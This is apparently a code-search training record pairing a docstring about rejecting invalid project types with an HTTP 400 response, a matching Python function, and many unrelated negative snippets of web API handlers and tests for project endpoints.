[ "0.61842567", "0.61777836", "0.6167748", "0.6167748", "0.6167748", "0.6167748", "0.6167748", "0.6167748", "0.6167748", "0.6167748", "0.6167748", "0.6158104", "0.61537033", "0.59816474", "0.59589577", "0.5941578", "0.59333587", "0.5928325", "0.5923485", "0.5907195", "0.5892558", "0.5870993", "0.5845033", "0.581714", "0.5807843", "0.57873607", "0.57797146", "0.57791287", "0.5776901", "0.57753307" ]
0.63319796
0
API return string and HTTP Bad Request (400) issued when project type is not valid.
def invalid_project_tye_msg(proj_type): return {"error": f"Project type {proj_type} is not valid, please use one of the following: " f"{', '.join(project_types)}"}, 400
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def api_response(project_type, result):\n if project_type not in project_types:\n return invalid_project_tye_msg(project_type)\n return result", "def bad_request():\n return HttpError(400)", "def bad_request(self, request, message):\n if request.META.get('CONTENT_TYPE') == 'application/vnd.api+json':\n content = {'errors': {'changeset': message}}\n return HttpResponseBadRequest(\n dumps(content), content_type='application/vnd.api+json')\n else:\n return HttpResponseBadRequest(message)", "def test_invalid_project_create(self):\n\n responses.add(\n responses.POST,\n self.host + \"/manager\",\n json={\n 'message': \"Project names must start with a letter, followed by any number of letters, digits, '-' or '_'.\",\n 'status': \"error\"\n },\n status=200\n )\n\n with self.assertRaises(CreateError):\n self.azk.create('123', 'description')", "def BadRequest(message):\n return f\"Bad Request: {message}\", 400", "def post(self):\n try:\n draft_project_dto = DraftProjectDTO(request.get_json())\n draft_project_dto.user_id = token_auth.current_user()\n draft_project_dto.validate()\n except DataError as e:\n current_app.logger.error(f\"error validating request: {str(e)}\")\n return {\"Error\": \"Unable to create project\", \"SubCode\": \"InvalidData\"}, 400\n\n try:\n draft_project_id = ProjectAdminService.create_draft_project(\n draft_project_dto\n )\n return {\"projectId\": draft_project_id}, 201\n except ProjectAdminServiceError as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 403\n except (InvalidGeoJson, InvalidData) as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 400", "def test_invalid_locale_and_project(self):\n response = self.client.get('/invalid-locale/invalid-project/')\n assert_equal(response.status_code, 404)", "def bad_request(self, error):\n return jsonify({'error': 'BAD REQUEST'}), 400", "def bad_request_400(error):\n return jsonify({\n 'success': False,\n 'message': 'Bad request',\n 'error': 400\n }), 400", "def test_patch_project_type_change(self):\n url = reverse(\n 'projectroles:api_project_update',\n kwargs={'project': self.project.sodar_uuid},\n )\n patch_data = {'type': PROJECT_TYPE_CATEGORY}\n response = self.request_knox(url, method='PATCH', data=patch_data)\n self.assertEqual(response.status_code, 400, msg=response.content)", "def check_project_id(project_id):\n # Convert variable into a string\n project_id = str(project_id)\n # Replace Capital letters and spaces\n project_id = project_id.replace(\" \", \"-\").lower()\n\n # Throw an error if any known incorrect usages found\n try:\n if re.search(\"^-|[^a-z0-9-]|google|ssl|-$\", project_id):\n raise ValueError(\"Invalid characters or words in Project ID\")\n elif len(project_id) > 30:\n raise ValueError(\"Too many characters in Project ID\")\n elif len(project_id) < 6:\n raise ValueError(\"More Characters required in Project ID\")\n else:\n log.info(f\"Project Id {project_id} passed regex check\")\n project_outcome = {\n \"outcome\": True,\n \"project_id\": project_id\n }\n return project_outcome\n except ValueError as e:\n log.warning(f\"Proposed Id {project_id} violates known google policies: \"\n \"https://cloud.google.com/resource-manager/docs/creating-managing-projects\")\n project_outcome = {\n \"outcome\": False,\n \"project_id\": project_id\n }\n return project_outcome", "def __get_project_id(self):\n request = urllib2.Request(self.host_api+\"projects?owner=\"+urllib2.quote(self.owner)+\"&display_name=\"+urllib2.quote(self.project_name))\n # request = urllib2.Request(self.host_api+\"projects?owner=\"+self.owner+\"&display_name=Galaxy%20Zoo%20Bar%20Lengths\")\n # print hostapi+\"projects?owner=\"+owner+\"&display_name=\"+project_name\n request.add_header(\"Accept\",\"application/vnd.api+json; version=1\")\n request.add_header(\"Authorization\",\"Bearer \"+self.token)\n\n # request\n try:\n response = urllib2.urlopen(request)\n except urllib2.HTTPError as e:\n print self.host_api+\"projects?owner=\"+self.owner+\"&display_name=\"+self.project_name\n print 'The server couldn\\'t fulfill the request.'\n print 'Error code: ', e.code\n print 'Error response body: ', e.read()\n except urllib2.URLError as e:\n print 'We failed to reach a server.'\n print 'Reason: ', e.reason\n else:\n # everything is fine\n body = response.read()\n\n # put it in json structure and extract id\n data = json.loads(body)\n return data[\"projects\"][0][\"id\"]", "def _validate(self, project_id: str,\n project_creation_mode: workflow.ProjectCreationMode, s: str):\n if not (4 <= len(s) <= 30):\n raise ValueError(\n ('Invalid Google Cloud Platform project name \"{}\": '\n 'must be between 4 and 30 characters').format(s))\n\n if self._is_new_project(project_creation_mode):\n return\n\n assert project_id is not None\n\n project_name = self.project_client.get_project(project_id)['name']\n if project_name != s:\n raise ValueError('Wrong project name given for project id.')", "def test_returns_404_if_project_doesnt_exist(self):\n # Act\n response = self.client.get(\"/api/v2/projects/999/queries/aoi/\")\n self.assertEqual(response.status_code, 404)", "def _validate(self, backend: str, active_account: str, project_id: str):\n\n if not re.match(r'[a-z][a-z0-9\\-]{5,29}', project_id):\n raise ValueError(\n ('Invalid Google Cloud Platform Project ID \"{}\": '\n 'must be between 6 and 30 characters and contain '\n 'lowercase letters, digits or hyphens').format(project_id))\n\n if not self.project_client.project_exists(project_id):\n raise ValueError('Project {} does not exist'.format(project_id))\n\n if not self._has_correct_permissions(backend, project_id,\n active_account):\n msg = 'User has incorrect permissions to deploy.'\n if backend == 'gae':\n msg = 'User must be a Project Owner to deploy on GAE'\n elif backend == 'gke':\n msg = ('User does not have correct permissions'\n 'to deploy on GKE')\n raise ValueError(msg)", "def test_create_project_request(self):\n pass", "def post(self, request, formal=None):\n serializers = ProjectSerializer(data=request.data)\n if serializers.is_valid():\n serializers.save()\n return Response(serializers.data, status=status.HTTP_201_CREATED)\n permission_classes=(IsAdminOrReadOnly)\n return Response(serializers.errors, status=status.HTTP_400_BAD_REQUEST)", "def send_incorrect_json_bad_request():\n return make_response(jsonify({\"validation_error\": {\n \"error\": 'Syntax error',\n \"description\": 'Parsing of input JSON is unavailable'\n }}), 400)", "def internal_error_400(error):\n return jsonify({'error':\n \"Die Anfrage wurde syntaktisch falsch erstellt.\"}), 400", "def test_returns_404_if_project_doesnt_exist(self):\n # Act\n response = self.client.get(\"/api/v2/projects/999/queries/summary/\")\n self.assertEqual(response.status_code, 404)", "def _PatchProjectReturnType(self):\n projects_method = registry.GetMethod('cloudresourcemanager.projects',\n 'list')\n self.StartObjectPatch(projects_method, 'GetResponseType',\n return_value=ProjectsMessage)", "def _create_project(self):\n request = {\n \"project\": {\n \"description\": \"description\",\n \"enabled\": True,\n \"name\": uuid.uuid4().hex,\n \"domain_id\": \"default\",\n }\n }\n response = self.client.post(PROJECT_PATH, data=json.dumps(request),\n headers=HEADERS)\n\n if response.status_code == 201:\n return response.json()\n else:\n raise SystemExit(\"Failed to create project.\")", "def json_not_provided(err):\n current_app.logger.exception(err)\n return 'No JSON found with request', 400", "def test_get_project_id_from_name_missing_proj(self, mock_get):\n mock_get.side_effect = CharonError('Error', status_code=404)\n with self.assertRaises(ValueError):\n get_project_id_from_name(self.project_name)", "def test_create_projeto_fail(client, fake_login_superuser):\n response = client.post(\n \"/api/v1/projeto\",\n data={\n 'nome': 'Agronomia',\n 'descricao': \"Falta objetivo\"\n }\n )\n assert response.status_code == 422", "def test_request_membership_form_with_an_invalid_project_id(self):\n pass", "def test_retrieve_invalid_app_name(self):\n setting_name = 'project_str_setting'\n url = reverse(\n 'projectroles:api_project_setting_retrieve',\n kwargs={'project': self.project.sodar_uuid},\n )\n get_data = {\n 'app_name': 'NON-EXISTING-APP',\n 'setting_name': setting_name,\n }\n response = self.request_knox(url, data=get_data)\n self.assertEqual(response.status_code, 400, msg=response.content)", "def test_incorrect_type(self):\n body = json.dumps({\n \"first_name\": 200,\n \"last_name\": \"Holmes\",\n \"email\": \"[email protected]\",\n \"password\": \"ilovek@ndA!\"\n })\n\n errorObject = {\n \"error\": \"Bad request\",\n \"field_errors\": {\n \"first_name\": [\"Invalid field type\"]\n }\n }\n\n result = self.simulate_post('/', body=body, headers=headers)\n\n self.assertEqual(result.status_code, 400)\n self.assertEqual(result.json, errorObject)", "def bad_request(message):\n return error_response(400, message)", "def test_bad_param(self):\n url = '/%s/job-types/validation/' % self.api\n manifest = copy.deepcopy(job_test_utils.COMPLETE_MANIFEST)\n manifest['name'] = None\n json_data = {\n 'manifest': manifest,\n 'configuration': self.configuration\n }\n\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n results = json.loads(response.content)\n self.assertFalse(results['is_valid'])\n self.assertEqual(len(results['errors']), 1)\n self.assertEqual(results['errors'][0]['name'], 'JSON_VALIDATION_ERROR')" ]
[ "0.70865583", "0.6068282", "0.59508896", "0.5887611", "0.58829206", "0.584176", "0.5705421", "0.56078774", "0.56074756", "0.5575878", "0.5568863", "0.55578727", "0.555444", "0.5553019", "0.5551587", "0.5527737", "0.5523695", "0.5515269", "0.55109483", "0.54840106", "0.54434466", "0.54334056", "0.5415354", "0.5409887", "0.5395762", "0.539235", "0.5382481", "0.5381129", "0.5372594", "0.5367218" ]
0.7925061
0
Wrapper to return the desired api response only if the specified project type is valid
def api_response(project_type, result): if project_type not in project_types: return invalid_project_tye_msg(project_type) return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_project_or_study(obj_type, obj_id):\n \n response = None\n\n try:\n if obj_type not in set([\"projects\", \"studies\"]):\n raise Exception(\"Invalid object type specified\")\n\n files_d = {}\n files_d.update(file_dict[obj_type][\"valid\"])\n files_d.update(file_dict[obj_type][\"invalid\"])\n\n if obj_id in files_d.keys():\n json_file = data_dir + files_d[obj_id]\n if os.path.exists(json_file):\n response = get_response(open(json_file, \"r\").read())\n else:\n response = get_response(not_found_json, status=404)\n else:\n if obj_id == \"NA\": # endpoint not implemented simulation,\n # return 501 instead of 404\n response = get_response(not_found_json, status=501)\n else: \n response = get_response(not_found_json, status=404)\n\n except Exception as e:\n response_body = '''{\"message\": \"invalid resource '%s'\"}''' % obj_type\n response = get_response(response_body, status=400)\n \n return response", "def invalid_project_tye_msg(proj_type):\n return {\"error\": f\"Project type {proj_type} is not valid, please use one of the following: \"\n f\"{', '.join(project_types)}\"}, 400", "def test_returns_projects_filter_by_mapping_types(self):\n # Arrange\n self.test_project_1.mapping_types = [MappingTypes.BUILDINGS.value]\n self.test_project_1.save()\n # Set project_2 to be allowed for all users removing as private.\n self.test_project_2.mapping_types = [MappingTypes.ROADS.value]\n self.test_project_2.private = False\n self.test_project_2.save()\n # Set mapping type of test_project_3 to waterways.\n self.test_project_3.mapping_types = [MappingTypes.WATERWAYS.value]\n self.test_project_3.status = ProjectStatus.PUBLISHED.value\n self.test_project_3.save()\n # Create a new project with other mapping type.\n\n test_project_4 = TestProjectsAllAPI.create_cloned_project_with_mapping_types(\n self.test_project_3.id, self.test_author.id, [MappingTypes.LAND_USE.value]\n )\n # Create a new project with land use mapping type.\n test_project_5 = TestProjectsAllAPI.create_cloned_project_with_mapping_types(\n self.test_project_3.id, self.test_author.id, [MappingTypes.OTHER.value]\n )\n # Create a new project with all mapping types.\n test_project_6 = TestProjectsAllAPI.create_cloned_project_with_mapping_types(\n self.test_project_3.id,\n self.test_author.id,\n [\n MappingTypes.BUILDINGS.value,\n MappingTypes.ROADS.value,\n MappingTypes.WATERWAYS.value,\n MappingTypes.LAND_USE.value,\n MappingTypes.OTHER.value,\n ],\n )\n\n # Act\n response_buildings = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.BUILDINGS.name]},\n )\n # Assert\n self.assertEqual(response_buildings.status_code, 200)\n self.assertEqual(len(response_buildings.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_buildings.json[\"results\"]],\n [self.test_project_1.id, test_project_6.id],\n )\n\n # Act\n response_roads = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.ROADS.name]},\n )\n # Assert\n self.assertEqual(response_roads.status_code, 200)\n self.assertEqual(len(response_roads.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_roads.json[\"results\"]],\n [self.test_project_2.id, test_project_6.id],\n )\n\n # Act\n response_waterways = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.WATERWAYS.name]},\n )\n # Assert\n self.assertEqual(response_waterways.status_code, 200)\n self.assertEqual(len(response_waterways.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_waterways.json[\"results\"]],\n [self.test_project_3.id, test_project_6.id],\n )\n\n # Act\n response_land_use = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.LAND_USE.name]},\n )\n # Assert\n self.assertEqual(response_land_use.status_code, 200)\n self.assertEqual(len(response_land_use.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_land_use.json[\"results\"]],\n [test_project_4.id, test_project_6.id],\n )\n\n # Act\n response_other = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": [MappingTypes.OTHER.name]},\n )\n # Assert\n self.assertEqual(response_other.status_code, 200)\n self.assertEqual(len(response_other.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_other.json[\"results\"]],\n [test_project_5.id, test_project_6.id],\n )\n\n # Test filter by multiple mapping types returns projects with any of the mapping types in the list.\n # Act\n response_all = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": \"BUILDINGS,ROADS,WATERWAYS,LAND_USE,OTHER\"},\n )\n # Assert\n self.assertEqual(response_all.status_code, 200)\n self.assertEqual(len(response_all.json[\"results\"]), 6)\n\n # Test mappingTypesExact returns only projects with exact mapping types.\n # Act\n response_exact = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": \"BUILDINGS\", \"mappingTypesExact\": \"true\"},\n )\n # Assert\n self.assertEqual(response_exact.status_code, 200)\n self.assertEqual(len(response_exact.json[\"results\"]), 1)\n self.assertEqual(\n response_exact.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )", "def search_project_or_study(obj_type):\n\n matches = []\n response = None\n\n try:\n if obj_type not in set([\"projects\", \"studies\"]):\n raise Exception(\"Invalid object type specified\")\n\n possible_filters = filters_d[obj_type]\n \n for f in file_dict[obj_type][\"valid\"].values():\n json_file = data_dir + f\n json_s = open(json_file, \"r\").read()\n json_obj = json.loads(json_s)\n add_to_matches = True\n\n for filter_name in possible_filters:\n filter_val = request.args.get(filter_name)\n if filter_val:\n if json_obj[filter_name] != filter_val:\n add_to_matches = False\n \n if add_to_matches:\n matches.append(json_s)\n\n response_body = \"[\" + \",\".join(matches) + \"]\"\n response = get_response(response_body, status=200)\n\n except Exception as e:\n print(\"bad request\")\n response_body = '''{\"message\": \"invalid resource '%s'\"}''' % obj_type\n response = get_response(response_body, status=400)\n\n return response", "def test_get_project(self):\n url = reverse(\n 'projectroles:api_project_retrieve',\n kwargs={'project': self.project.sodar_uuid},\n )\n response = self.request_knox(url)\n\n self.assertEqual(response.status_code, 200)\n response_data = json.loads(response.content)\n expected = {\n 'title': self.project.title,\n 'type': self.project.type,\n 'parent': str(self.category.sodar_uuid),\n 'description': self.project.description,\n 'readme': '',\n 'public_guest_access': False,\n 'archive': False,\n 'roles': {\n str(self.owner_as_cat.sodar_uuid): {\n 'user': self.get_serialized_user(self.user_owner_cat),\n 'role': PROJECT_ROLE_OWNER,\n 'inherited': True,\n 'sodar_uuid': str(self.owner_as_cat.sodar_uuid),\n },\n str(self.owner_as.sodar_uuid): {\n 'user': self.get_serialized_user(self.user_owner),\n 'role': PROJECT_ROLE_OWNER,\n 'inherited': False,\n 'sodar_uuid': str(self.owner_as.sodar_uuid),\n },\n },\n 'sodar_uuid': str(self.project.sodar_uuid),\n }\n self.assertEqual(response_data, expected)", "def test_returns_moderate_projects_if_difficulty_set_to_moderate(self):\n # Arrange\n self.test_project_2.private = False\n # Change difficulty of test_project_2 to easy so that it is not returned.\n self.test_project_2.difficulty = ProjectDifficulty.EASY.value\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"difficulty\": \"MODERATE\"},\n )\n # User is only permitted to map test_project_1 and test_project_2, since test_project_3 is DRAFT.\n # So we should get only test_project_1 as it is the only project with difficulty set to MODERATE.\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 1)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )", "def test_returns_all_projects_that_user_is_permitted_if_action_set_to_any(self):\n # Arrange\n self.test_project_2.private = False\n # Since test_author is BEGINNER, they can only map projects with mapping permission ANY.\n self.test_project_1.mapping_permission = MappingPermission.ANY.value\n self.test_project_1.save()\n self.test_project_2.mapping_permission = MappingPermission.ANY.value\n self.test_project_2.save()\n # Archive test_project_2 so that it is not returned if action set to any.\n test_project_4 = Project.clone(self.test_project_2.id, self.test_author.id)\n test_project_4.status = ProjectStatus.ARCHIVED.value\n # Validate all tasks of test_project_2 to check finished projects are not returned if action set to any.\n MappingService.map_all_tasks(self.test_project_2.id, self.test_author.id)\n ValidatorService.validate_all_tasks(self.test_project_2.id, self.test_author.id)\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"action\": \"any\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 2)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )\n self.assertEqual(\n response.json[\"results\"][1][\"projectId\"], self.test_project_2.id\n )", "def test_returns_projects_with_tasks_to_validate_if_action_set_to_validate(self):\n # Arrange\n self.test_project_2.private = False\n # Since test_author is BEGINNER, they can only validate projects with validation permission ANY.\n self.test_project_1.validation_permission = ValidationPermission.ANY.value\n self.test_project_1.save()\n self.test_project_2.validation_permission = ValidationPermission.ANY.value\n self.test_project_2.save()\n # Reset all tasks of test_project_2 so that there are no tasks ready to validate.\n MappingService.map_all_tasks(self.test_project_2.id, self.test_author.id)\n ValidatorService.validate_all_tasks(self.test_project_2.id, self.test_author.id)\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"action\": \"validate\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n # Test_project_2 has no tasks to validate, it should not be returned even when user has permsiion to validate.\n self.assertEqual(len(response.json[\"results\"]), 1)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )", "def test_projects_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_project_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project',\n json=expected_response,\n status=200\n )\n resp = requests.get(f'{os.environ[\"AIVEN_API_URL\"]}/v1/project')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n assert responses.calls[0].request.url == f'{os.environ[\"AIVEN_API_URL\"]}/v1/project'\n assert \"MY-PROJECT-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def _PatchProjectReturnType(self):\n projects_method = registry.GetMethod('cloudresourcemanager.projects',\n 'list')\n self.StartObjectPatch(projects_method, 'GetResponseType',\n return_value=ProjectsMessage)", "def test_org_unit_types_retrieve_without_auth_or_app_id(self):\n\n response = self.client.get(f\"/api/orgunittypes/{self.org_unit_type_1.id}/\")\n self.assertJSONResponse(response, 404)", "def test_returns_404_if_project_doesnt_exist(self):\n # Act\n response = self.client.get(\"/api/v2/projects/999/queries/aoi/\")\n self.assertEqual(response.status_code, 404)", "def is_project_in_the_response(projectComponent, response):\n for project in response:\n if response[project] == projectComponent:\n return True\n return False", "def test_patch_project_type_change(self):\n url = reverse(\n 'projectroles:api_project_update',\n kwargs={'project': self.project.sodar_uuid},\n )\n patch_data = {'type': PROJECT_TYPE_CATEGORY}\n response = self.request_knox(url, method='PATCH', data=patch_data)\n self.assertEqual(response.status_code, 400, msg=response.content)", "def test_get(self):\n url = reverse('projectroles:api_project_list')\n response = self.request_knox(url)\n\n # Assert response\n self.assertEqual(response.status_code, 200)\n response_data = json.loads(response.content)\n self.assertEqual(len(response_data), 2)\n expected = [\n {\n 'title': self.category.title,\n 'type': self.category.type,\n 'parent': None,\n 'description': self.category.description,\n 'readme': '',\n 'public_guest_access': False,\n 'archive': False,\n 'roles': {\n str(self.owner_as_cat.sodar_uuid): {\n 'user': self.get_serialized_user(self.user_owner_cat),\n 'role': PROJECT_ROLE_OWNER,\n 'inherited': False,\n 'sodar_uuid': str(self.owner_as_cat.sodar_uuid),\n }\n },\n 'sodar_uuid': str(self.category.sodar_uuid),\n },\n {\n 'title': self.project.title,\n 'type': self.project.type,\n 'parent': str(self.category.sodar_uuid),\n 'description': self.project.description,\n 'readme': '',\n 'public_guest_access': False,\n 'archive': False,\n 'roles': {\n str(self.owner_as_cat.sodar_uuid): {\n 'user': self.get_serialized_user(self.user_owner_cat),\n 'role': PROJECT_ROLE_OWNER,\n 'inherited': True,\n 'sodar_uuid': str(self.owner_as_cat.sodar_uuid),\n },\n str(self.owner_as.sodar_uuid): {\n 'user': self.get_serialized_user(self.user_owner),\n 'role': PROJECT_ROLE_OWNER,\n 'inherited': False,\n 'sodar_uuid': str(self.owner_as.sodar_uuid),\n },\n },\n 'sodar_uuid': str(self.project.sodar_uuid),\n },\n ]\n self.assertEqual(response_data, expected)", "def handle(conn, method, addr, data):\n\tif (addr == \"/api/project\") or addr.startswith(\"/api/project/\"):\n\t\treturn handleApiProject(conn, method, addr, data)\n\tif addr == \"/api/projectsCount\":\n\t\treturn handleApiProjectsCount(conn, method, addr, data)\n\tif (addr == \"/api/getProject\") or addr.startswith(\"/api/getProject?\"):\n\t\treturn handleApiGetProject(conn, method, addr, data)\n\tif (addr == \"/api/getProjects\") or addr.startswith(\"/api/getProjects?\"):\n\t\treturn handleApiGetProjects(conn, method, addr, data)\n\tif addr == \"/api/getProjectsCount\":\n\t\treturn handleApiGetProjectsCount(conn, method, addr, data)\n\tif (addr == \"/api/getProjectCard\") or addr.startswith(\"/api/getProjectCard?\"):\n\t\treturn handleApiGetProjectCard(conn, method, addr, data)\n\tif addr == \"/api/getProject\":\n\t\tcore.sendAnswer(conn, \"400 Bad Request\")\n\t\treturn True\n\treturn False", "def rest_api_request_handler(self, request_type):\n result = {}\n success_code = 0\n with self.resource_lock:\n if request_type == self.RestRequest.REST_MUTS:\n result = self.muts # Returns MUTs\n elif request_type == self.RestRequest.REST_TEST_SPEC:\n result = self.test_spec # Returns Test Specification\n elif request_type == self.RestRequest.REST_TEST_RESULTS:\n pass # Returns test results\n else:\n success_code = -1\n return json.dumps(self.get_rest_result_template(result, 'request/' + request_type, success_code), indent=4)", "def test_get_status_no_project(\n get_internal_project: MagicMock,\n step_writer_serialize: MagicMock,\n):\n get_internal_project.return_value = None\n\n response = statuses.get_status(0, force=True)\n\n assert response['success'], \"\"\"\n Expect the status process to be successful.\n \"\"\"\n assert response['data']['project'] is None, \"\"\"\n Expect there to be no project data.\n \"\"\"\n assert 0 == step_writer_serialize.call_count, \"\"\"\n Expect no step serialization to be carried out.\n \"\"\"\n assert [] == response['data']['step_changes'], \"\"\"\n Expect no step changes to exist without project data.\n \"\"\"\n assert response['hash'].startswith('forced-'), \"\"\"\n Expect a forced call to have a forced hash.\n \"\"\"", "def test_returns_projects_filter_by_statuses(self):\n # Arrange\n self.test_project_1.status = ProjectStatus.DRAFT.value\n self.test_project_1.save()\n # Set project_2 to be allowed for all users removing as private.\n self.test_project_2.private = False\n self.test_project_2.save()\n # Set status of test_project_3 to archived.\n self.test_project_3.status = ProjectStatus.ARCHIVED.value\n self.test_project_3.save()\n\n # Act\n response_pub = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"projectStatuses\": [ProjectStatus.PUBLISHED.name]},\n )\n # Assert\n self.assertEqual(response_pub.status_code, 200)\n self.assertEqual(len(response_pub.json[\"results\"]), 1)\n self.assertEqual(\n response_pub.json[\"results\"][0][\"projectId\"], self.test_project_2.id\n )\n\n # Act\n response_draft = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"projectStatuses\": [ProjectStatus.DRAFT.name]},\n )\n # Assert\n self.assertEqual(response_draft.status_code, 200)\n self.assertEqual(len(response_draft.json[\"results\"]), 1)\n self.assertEqual(\n response_draft.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )\n\n # Act\n response_archived = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"projectStatuses\": [ProjectStatus.ARCHIVED.name]},\n )\n # Assert\n self.assertEqual(response_archived.status_code, 200)\n self.assertEqual(len(response_archived.json[\"results\"]), 1)\n self.assertEqual(\n response_archived.json[\"results\"][0][\"projectId\"], self.test_project_3.id\n )\n\n # Test multiple statuses returns all projects with those statuses.\n # Act\n response_all = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\n \"projectStatuses\": \"PUBLISHED,DRAFT,ARCHIVED\",\n },\n )\n # Assert\n self.assertEqual(response_all.status_code, 200)\n self.assertEqual(len(response_all.json[\"results\"]), 3)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_all.json[\"results\"]],\n [self.test_project_1.id, self.test_project_2.id, self.test_project_3.id],\n )", "def test_returns_all_projects_if_difficulty_set_to_all(self):\n # Arrange\n self.test_project_2.private = False\n # Set difficulty of test_project_2 to easy.\n self.test_project_2.difficulty = ProjectDifficulty.EASY.value\n self.test_project_2.save()\n self.test_project_1.difficulty = ProjectDifficulty.MODERATE.value\n self.test_project_1.save()\n test_project_4 = Project.clone(self.test_project_2.id, self.test_author.id)\n test_project_4.status = ProjectStatus.PUBLISHED.value\n test_project_4.difficulty = ProjectDifficulty.CHALLENGING.value\n test_project_4.save()\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"difficulty\": \"ALL\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n # User is only permitted for test_project 1, 2 and 4, since test_project_3 is DRAFT.\n self.assertEqual(len(response.json[\"results\"]), 3)\n self.assertNotIn(\n self.test_project_3.id, [i[\"projectId\"] for i in response.json[\"results\"]]\n )", "def test_returns_404_if_project_doesnt_exist(self):\n # Act\n response = self.client.get(\"/api/v2/projects/999/queries/summary/\")\n self.assertEqual(response.status_code, 404)", "def format_service_api_response(func):\n @wraps(func)\n def get_response(*args, **kwargs):\n try:\n res = func(*args, **kwargs)\n return {\"status\": \"200\", \"result\": res}\n except:\n return {\"status\": \"404\", \"result\": \"\"}\n return get_response", "def get(self):\n authenticated_user_id = token_auth.current_user()\n orgs_dto = OrganisationService.get_organisations_managed_by_user_as_dto(\n authenticated_user_id\n )\n if len(orgs_dto.organisations) < 1:\n return {\n \"Error\": \"User is not a manager of the project\",\n \"SubCode\": \"UserPermissionError\",\n }, 403\n\n try:\n search_dto = ProjectSearchBBoxDTO()\n search_dto.bbox = map(float, request.args.get(\"bbox\").split(\",\"))\n search_dto.input_srid = request.args.get(\"srid\")\n search_dto.preferred_locale = request.environ.get(\"HTTP_ACCEPT_LANGUAGE\")\n created_by_me = (\n strtobool(request.args.get(\"createdByMe\"))\n if request.args.get(\"createdByMe\")\n else False\n )\n if created_by_me:\n search_dto.project_author = authenticated_user_id\n search_dto.validate()\n except Exception as e:\n current_app.logger.error(f\"Error validating request: {str(e)}\")\n return {\n \"Error\": f\"Error validating request: {str(e)}\",\n \"SubCode\": \"InvalidData\",\n }, 400\n try:\n geojson = ProjectSearchService.get_projects_geojson(search_dto)\n return geojson, 200\n except BBoxTooBigError as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 400\n except ProjectSearchServiceError as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 400", "def API_company(request):\n query = request.GET\n if any(key for key in query if key not in API_COMPANY_VALIDKEYS):\n #print([(key,key not in API_COMPANY_VALIDKEYS) for key in query])\n return django.http.HttpResponseBadRequest(\"Invalid query\")\n if \"search\" in query:\n return API_companysearch(request)\n elif \"po\" in query:\n return API_companypo(request)\n return django.http.Http404()", "def returns_404_if_project_doesnt_exist(self):\n # Act\n response = self.client.get(\"/api/v2/projects/999/queries/priority-areas/\")\n self.assertEqual(response.status_code, 404)", "def get(self, project_id):\n try:\n authenticated_user_id = token_auth.current_user()\n as_file = bool(\n strtobool(request.args.get(\"as_file\"))\n if request.args.get(\"as_file\")\n else False\n )\n abbreviated = bool(\n strtobool(request.args.get(\"abbreviated\"))\n if request.args.get(\"abbreviated\")\n else False\n )\n project_dto = ProjectService.get_project_dto_for_mapper(\n project_id,\n authenticated_user_id,\n request.environ.get(\"HTTP_ACCEPT_LANGUAGE\"),\n abbreviated,\n )\n\n if project_dto:\n project_dto = project_dto.to_primitive()\n if as_file:\n return send_file(\n io.BytesIO(geojson.dumps(project_dto).encode(\"utf-8\")),\n mimetype=\"application/json\",\n as_attachment=True,\n download_name=f\"project_{str(project_id)}.json\",\n )\n\n return 